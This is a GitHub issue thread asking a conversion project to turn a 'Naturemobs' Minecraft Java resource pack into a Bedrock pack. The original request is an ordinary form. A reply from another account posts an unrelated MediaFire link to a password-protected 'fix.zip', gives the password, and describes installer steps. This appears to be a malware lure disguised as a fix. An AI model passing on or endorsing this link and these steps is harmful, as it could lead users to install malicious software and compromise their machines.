### ISSUE TITLE
[Pack]: Naturemobs

### ISSUE THREAD

**Issue by Justine04** [Kas-tle/java2bedrock.sh#33300]
### Java Pack Direct Download URL

https://cdn.discordapp.com/attachments/1269304854921220146/1277477866493448212/nature_mobs_resourcepack.zip?ex=66cd4f79&is=66cbfdf9&hm=3fc7cdd7cb5ef1e2cf775897cb04e75f8a6b844a5782dfcce57448e73d81ae46&

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
